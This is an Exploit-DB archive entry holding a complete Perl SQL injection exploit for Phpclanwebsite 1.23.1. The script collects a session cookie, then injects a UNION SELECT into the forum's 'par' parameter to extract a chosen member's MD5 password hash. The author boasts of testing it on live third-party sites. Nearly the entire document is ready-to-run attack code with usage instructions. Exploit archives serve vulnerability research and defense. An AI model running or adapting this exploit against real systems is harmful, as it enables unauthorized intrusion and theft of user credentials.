Phpclanwebsite 1.23.1 - SQL Injection

EDB-ID:

1453




Platform:

PHP

Date:

2006-01-25


#!perl
#Phpclanwebsite 1.23.1 SQL injection exploit by matrix_killer
#Greets to all omega-team members[and specially to EcLiPsE] and also to h4cky0u[h4cky0u.org], Alpha-Fan, Chameleon and all my friends
#The exploit was tested on phpclan's website and it worked + my local server and on ra4ev.com
#But on versions below 1.23.1 it doesn't seem to work

use IO::Socket;
$host = $ARGV[0];
$path = $ARGV[1];
$topic = $ARGV[2];
$id = $ARGV[3];

if (@ARGV < 4) {
  print "---------------------------------------------------------\n";
  print "-- Phpclanwebsite 1.23.1 SQL Injection sploit --\n";
  print "-- (C)oded by matrix_killer --\n";
  print "-- Contact: matrix_k\@abv.bg || matrix_killer\@ra4ev.com --\n";
  print "-- Usage: $0 [host] [path] [topic] [id] --\n";
  print "-- Ex: $0 127.0.0.1 cws 2 2 --\n";
  print "---------------------------------------------------------\n";
  exit();
}
$sock = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a connection\n";

print $sock "GET /$path/index.php?page=forum&func=post&par=$topic HTTP/1.1\n";
print $sock "User-Agent: Mozilla/4.0\n";
print $sock "Host: $host\n\n";
while ($asd = <$sock>) {
        if ($asd =~ /Set-Cookie:/gi) {
             $asd =~ /cuser_id=([a-zA-Z0-9]{32})/;
             $cookie = $1;
        }
}
$sock->close;

$socket = IO::Socket::INET->new(PeerAddr => "$host",PeerPort => "80",Proto => "tcp") || die "Can't establish a connection\n";
print "-- Connection Established --\n";

print $socket "GET /$path/index.php?page=forum&func=post&par=$topic%20UNION%20SELECT%20null,null,null,null,null,null,password,null%20FROM%20cws_members%20WHERE%20member_id=$id/* HTTP/1.0\n";
print $socket "User-Agent: Mozilla/4.0\n";
print $socket "Host: $host\n";
print $socket "Cookie: cuser_id=$cookie; chitcounter=hitcounter\n\n";
print "-- Waiting... --\n";

while($ans = <$socket>) {
       if ($ans =~ /([a-zA-Z0-9]{32})/){
            if ($ans =~ /cookie/i) {
                 next;
            }
            print "\nmember id: $id \n";
            print "md5 hash: $1 \n";
            exit;
       }
}
print "Sorry there s33ms to be a problem\n";

# milw0rm.com [2006-01-25]